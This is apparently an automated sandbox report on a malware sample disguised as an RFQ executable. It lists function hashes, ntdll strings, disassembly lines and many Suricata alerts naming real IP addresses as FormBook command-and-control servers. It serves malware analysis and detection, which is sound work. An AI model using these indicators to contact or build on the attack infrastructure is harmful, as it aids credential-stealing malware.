Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 7b4c3bd98ad105604b3b8534a00917cab4ec634a8e0e0dbfa3a26991417cd744
Instruction ID: 75b5614da9509eeb94ebfc9d13b52cc8b106bb4f35249dd18be6de07412f3217
Opcode Fuzzy Hash: 7b4c3bd98ad105604b3b8534a00917cab4ec634a8e0e0dbfa3a26991417cd744
Instruction Fuzzy Hash: 0E90026138100443F50071594514B860009C7E2385F51C419E1855554DC629DC537166

Function 04FA2E00 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04FA2E0A

Memory Dump Source

Source File: 00000004.00000002.112737095408.0000000004F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 04F30000, based on PE: true

Associated: 00000004.00000002.112737095408.0000000005059000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.112737095408.000000000505D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4f30000_write.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 50c685b693514c1797e1d2d95bdcd4337249003de9765dbd4d1157c280916b4f
Instruction ID: 07a622ed04efb2f41587f2625d91eeaa6536ce31d989de1bf4b171d6fecd52d1
Opcode Fuzzy Hash: 50c685b693514c1797e1d2d95bdcd4337249003de9765dbd4d1157c280916b4f
Instruction Fuzzy Hash: AD90026124140403F54075594904687000987D1386F51C415A2855555ECA39DC527175

Function 04FA2F00 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04FA2F0A

Memory Dump Source

Source File: 00000004.00000002.112737095408.0000000004F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 04F30000, based on PE: true

Associated: 00000004.00000002.112737095408.0000000005059000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.112737095408.000000000505D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4f30000_write.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: f87b69daded2e0ce876a3e597201ca9a106a8e8b439b4a5765614bbe89d57643
Instruction ID: 84ca6d9baa03b57cdd26a1e6b2dbc5254a52066112f1128c4bd8fe0ffb211df4
Opcode Fuzzy Hash: f87b69daded2e0ce876a3e597201ca9a106a8e8b439b4a5765614bbe89d57643
Instruction Fuzzy Hash: 8A90022125180043F60075694D14B87000987D1387F51C519A0945554CC925D8626561

Function 04FA38D0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04FA38DA

Memory Dump Source

Source File: 00000004.00000002.112737095408.0000000004F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 04F30000, based on PE: true

Associated: 00000004.00000002.112737095408.0000000005059000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.112737095408.000000000505D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4f30000_write.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 22db0fa74e469f13bdb73a741f7e9e27b6f9f18cb177655742472bd06865051a
Instruction ID: 11e9910a7b357b9782284ec6fe61d5a85bfec676d206a09de922f4a1f0264830
Opcode Fuzzy Hash: 22db0fa74e469f13bdb73a741f7e9e27b6f9f18cb177655742472bd06865051a
Instruction Fuzzy Hash: EF90022128505103F550715D45046964009A7E1285F51C425A0C05594DC565D8567261

Function 04FA29F0 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 04FA29FA

Memory Dump Source

Source File: 00000004.00000002.112737095408.0000000004F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 04F30000, based on PE: true

Associated: 00000004.00000002.112737095408.0000000005059000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.112737095408.000000000505D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4f30000_write.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 3da7db49f64303ae475ded30a77563fe5e1983373451e32afb45f0b85c48644c
Instruction ID: 29f85a863d0d263bea010fd7fa8e3239664bc22b9663e52c6c073b98b1109b8a
Opcode Fuzzy Hash: 3da7db49f64303ae475ded30a77563fe5e1983373451e32afb45f0b85c48644c
Instruction Fuzzy Hash: E8900225251000032505B5590704587004A87D63D5351C425F1806550CD631D8626161

Function 04FA2AC0 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 04FA2ACA

Memory Dump Source

Source File: 00000004.00000002.112737095408.0000000004F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 04F30000, based on PE: true

Associated: 00000004.00000002.112737095408.0000000005059000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.112737095408.000000000505D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4f30000_write.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 4bb14c4914d68aeb46b84685d1fdbe8d6de7db1546c144ff6b61980e3cb9c9ef
Instruction ID: 37acefc96526f3431ffe943d00b8b986438c451e2225bba5c1dc6660c5ad3089
Opcode Fuzzy Hash: 4bb14c4914d68aeb46b84685d1fdbe8d6de7db1546c144ff6b61980e3cb9c9ef
Instruction Fuzzy Hash: 4790023164500803F550715945147C6000987D1385F51C415A0815654DC765DA5676E1

Function 04FA2A80 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 04FA2A8A

Memory Dump Source

Source File: 00000004.00000002.112737095408.0000000004F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 04F30000, based on PE: true

Associated: 00000004.00000002.112737095408.0000000005059000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.112737095408.000000000505D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4f30000_write.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: dec8e17ffcc89a1c31bc0c8c362fe179c0eda7b30c246ddc34189a3b627cd905
Instruction ID: a2eaff26650f55937a3bcf542728ea1a0664fe79b36b79eb5b4cb9f3e6dca5af
Opcode Fuzzy Hash: dec8e17ffcc89a1c31bc0c8c362fe179c0eda7b30c246ddc34189a3b627cd905
Instruction Fuzzy Hash: 1E90026124200003650571594514696400E87E1285B51C425E1805590DC535D8927165

Function 04FA2A10 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 04FA2A1A

Memory Dump Source

Source File: 00000004.00000002.112737095408.0000000004F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 04F30000, based on PE: true

Associated: 00000004.00000002.112737095408.0000000005059000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.112737095408.000000000505D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4f30000_write.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 62bf3c62f610df18f87581d67dbffbf9eee0d84d5c1c1d008594681d75217978
Instruction ID: 53926d9ab57b095267063230408b6471e8f3fc72867b287ac21a062444e90274
Opcode Fuzzy Hash: 62bf3c62f610df18f87581d67dbffbf9eee0d84d5c1c1d008594681d75217978
Instruction Fuzzy Hash: 70900225261000032545B559070458B044997D73D5391C419F1C07590CC631D8666361

Function 04FA2BC0 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 04FA2BCA

Memory Dump Source

Source File: 00000004.00000002.112737095408.0000000004F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 04F30000, based on PE: true

Associated: 00000004.00000002.112737095408.0000000005059000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.112737095408.000000000505D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4f30000_write.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 57730f8a907cd91171809c0fe821eb6a5905aeb79fa1d0e17c22fe56d630afbe
Instruction ID: 85d1f87fad209933ac81dfb1225254b49c333aeba596e2366a748f85e1dbf172
Opcode Fuzzy Hash: 57730f8a907cd91171809c0fe821eb6a5905aeb79fa1d0e17c22fe56d630afbe
Instruction Fuzzy Hash: 1990023124100403F500759955086C6000987E1385F51D415A5815555EC675D8927171

Function 04FA2B90 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 04FA2B9A

Memory Dump Source

Source File: 00000004.00000002.112737095408.0000000004F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 04F30000, based on PE: true

Associated: 00000004.00000002.112737095408.0000000005059000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.112737095408.000000000505D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4f30000_write.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: c391e4b00a0d3805f60b4317d5e08da687d0d8f24b4b5d1669422780c0b7b5fa
Instruction ID: 1bdf120887dc986779ca4229cc208fe72a1623c949ad50e46ee69b0966349185
Opcode Fuzzy Hash: c391e4b00a0d3805f60b4317d5e08da687d0d8f24b4b5d1669422780c0b7b5fa
Instruction Fuzzy Hash: 0A90023124108803F510715985047CA000987D1385F55C815A4C15658DC6A5D8927161

Function 04FA2B80 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 04FA2B8A

Memory Dump Source

Source File: 00000004.00000002.112737095408.0000000004F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 04F30000, based on PE: true

Associated: 00000004.00000002.112737095408.0000000005059000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.112737095408.000000000505D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4f30000_write.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 63dc172674d89c5bdf601eb79dfea449cd600fe485969147f81027c2510d423a
Instruction ID: 1845988212d67a57829af934f3f9a526525eeb17d925a2d3e7a4f937ccfc5700
Opcode Fuzzy Hash: 63dc172674d89c5bdf601eb79dfea449cd600fe485969147f81027c2510d423a
Instruction Fuzzy Hash: 8990023124100843F50071594504BC6000987E1385F51C41AA0915654DC625D8527561

Function 04FA2B10 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 04FA2B1A

Memory Dump Source

Source File: 00000004.00000002.112737095408.0000000004F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 04F30000, based on PE: true

Associated: 00000004.00000002.112737095408.0000000005059000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.112737095408.000000000505D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4f30000_write.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: c4687394cbe4b779709a5041ed7510ae272b43b0aab098b8422943b85ee40541
Instruction ID: 5dd97c4491d801889f7071ae1ba6f6c0c1d0bc9ddd6b661361eb80c030fea61b
Opcode Fuzzy Hash: c4687394cbe4b779709a5041ed7510ae272b43b0aab098b8422943b85ee40541
Instruction Fuzzy Hash: A290023124100803F580715945046CA000987D2385F91C419A0816654DCA25DA5A77E1

Function 04FA2B00 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 04FA2B0A

Memory Dump Source

Source File: 00000004.00000002.112737095408.0000000004F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 04F30000, based on PE: true

Associated: 00000004.00000002.112737095408.0000000005059000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.112737095408.000000000505D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4f30000_write.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 02f38b44cce46590e06da86f6715641208d7c0abfbe6e5ae280167f9ad28c458
Instruction ID: 38a2119c30c4553ecb8360a5b250dc9588edb2b8353a8278052cbfb9bb4a84a4
Opcode Fuzzy Hash: 02f38b44cce46590e06da86f6715641208d7c0abfbe6e5ae280167f9ad28c458
Instruction Fuzzy Hash: 8690023124504843F54071594504AC6001987D1389F51C415A0855694DD635DD56B6A1

Function 00C8938E Relevance: 1.5, APIs: 1, Instructions: 24
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlAllocateHeap.NTDLL ref: 00C89399

Memory Dump Source

Source File: 00000004.00000002.112735264468.0000000000C60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_c60000_write.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: fcd7159a8c25ade40d2ac994ca14527758cccad04934b620b461cadd1c92e4e9
Instruction ID: 4b766bf5340119afe7c2ec674177d1130d55076ca0e80f0f440967cd2de31c48
Opcode Fuzzy Hash: fcd7159a8c25ade40d2ac994ca14527758cccad04934b620b461cadd1c92e4e9
Instruction Fuzzy Hash: AEE02072268167CD9645A9794DD87ECBB06D58B3743CC07528172DB5FAC69048478289

Function 04FA2B2A Relevance: 1.5, APIs: 1, Instructions: 8
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 04FA2B44

Memory Dump Source

Source File: 00000004.00000002.112737095408.0000000004F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 04F30000, based on PE: true

Associated: 00000004.00000002.112737095408.0000000005059000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.112737095408.000000000505D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4f30000_write.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 535e2ae83ea104903d1549042cc68c7d346c7910bbc6776a1197565cb38d0120
Instruction ID: 647bc3d33c99d83531ee2a729d9d0d155faa4f5640b924826a77e29c83c979d9
Opcode Fuzzy Hash: 535e2ae83ea104903d1549042cc68c7d346c7910bbc6776a1197565cb38d0120
Instruction Fuzzy Hash: 94B09B71D414C5C7FB11EB604708757790467D1785F16C455D1860691E8738D096F175

Non-executed Functions

Function 04F97550 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON

Download Yara Rule

Strings

ExecuteOptions, xrefs: 04FD44AB
CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 04FD454D
CLIENT(ntdll): Processing section info %ws..., xrefs: 04FD4592
Execute=1, xrefs: 04FD451E
CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 04FD4507
CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 04FD4460
CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 04FD4530

Memory Dump Source

Source File: 00000004.00000002.112737095408.0000000004F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 04F30000, based on PE: true

Associated: 00000004.00000002.112737095408.0000000005059000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.112737095408.000000000505D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4f30000_write.jbxd

Similarity

API ID:
String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
API String ID: 0-484625025
Opcode ID: 2a320f9b43742fd5062707dfc7293d3379b178e552fea8a13d840c65dab6bcb9
Instruction ID: c99e2d0dcc87b1c7d6a5e860f538e116ad8465c6c169a17a42a8770c2de533de
Opcode Fuzzy Hash: 2a320f9b43742fd5062707dfc7293d3379b178e552fea8a13d840c65dab6bcb9
Instruction Fuzzy Hash: 41510731A10319FAFF51BE94ED89BAE77E8AF44304F0404A9E505A7180EB70BE478E50

Function 04F69046 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 199COMMON

Download Yara Rule

Strings

@w`w, xrefs: 04FC245B
@, xrefs: 04F69095
$, xrefs: 04F690B1

Memory Dump Source

Source File: 00000004.00000002.112737095408.0000000004F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 04F30000, based on PE: true

Associated: 00000004.00000002.112737095408.0000000005059000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.112737095408.000000000505D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4f30000_write.jbxd

Similarity

API ID:
String ID: $$@$@w`w
API String ID: 0-2042856498
Opcode ID: 45c2b06c53ffe32c0756d62ce5db0f8dd7c1d7754cf1376cf05d4277b054c69d
Instruction ID: c03b744eb09e56cd131dc5f696cf952d3b9a44f2ffdab642d300163b38cb9a5a
Opcode Fuzzy Hash: 45c2b06c53ffe32c0756d62ce5db0f8dd7c1d7754cf1376cf05d4277b054c69d
Instruction Fuzzy Hash: C3813DB2D002699BDB31CF54CD45BDEB6B8EB08714F0141DAE909B7240E7706E86CFA1

Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 4x nop then jmp 06D37A5Bh	0_2_06D37EBC
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 4x nop then jmp 06D37A5Bh	0_2_06D37FEC
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 4x nop then jmp 06D37A5Bh	0_2_06D38033
Source: C:\Windows\SysWOW64\write.exe	Code function: 4x nop then mov ebx, 00000004h	4_2_04E304DE

Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49822 -> 75.2.103.23:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49820 -> 75.2.103.23:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49818 -> 3.33.130.190:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49827 -> 65.21.196.90:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49838 -> 91.212.26.5:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49830 -> 65.21.196.90:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49819 -> 75.2.103.23:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49836 -> 91.212.26.5:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49841 -> 3.33.130.190:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49845 -> 154.23.184.194:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49847 -> 63.250.47.57:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49829 -> 65.21.196.90:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49844 -> 154.23.184.194:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49823 -> 161.97.168.245:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49863 -> 15.197.148.33:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49846 -> 154.23.184.194:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49824 -> 161.97.168.245:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49857 -> 68.66.226.116:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49883 -> 75.2.103.23:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49852 -> 172.67.220.57:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49882 -> 75.2.103.23:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49825 -> 161.97.168.245:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49848 -> 63.250.47.57:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49885 -> 161.97.168.245:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49837 -> 91.212.26.5:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49826 -> 161.97.168.245:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49851 -> 172.67.220.57:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49908 -> 63.250.47.57:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49850 -> 63.250.47.57:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49828 -> 65.21.196.90:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49906 -> 154.23.184.194:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49909 -> 63.250.47.57:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49821 -> 75.2.103.23:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49907 -> 154.23.184.194:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49855 -> 68.66.226.116:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49859 -> 76.223.54.146:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49911 -> 63.250.47.57:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49877 -> 15.197.148.33:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49867 -> 15.197.148.33:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49874 -> 15.197.148.33:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49835 -> 91.212.26.5:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49884 -> 161.97.168.245:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49843 -> 154.23.184.194:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49839 -> 3.33.130.190:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49887 -> 161.97.168.245:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49840 -> 3.33.130.190:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49858 -> 68.66.226.116:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49842 -> 3.33.130.190:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49891 -> 65.21.196.90:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49860 -> 76.223.54.146:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49873 -> 15.197.148.33:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49862 -> 76.223.54.146:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49888 -> 65.21.196.90:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49856 -> 68.66.226.116:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49896 -> 91.212.26.5:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49849 -> 63.250.47.57:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49866 -> 15.197.148.33:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49904 -> 154.23.184.194:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49871 -> 15.197.148.33:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49853 -> 172.67.220.57:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49876 -> 15.197.148.33:80
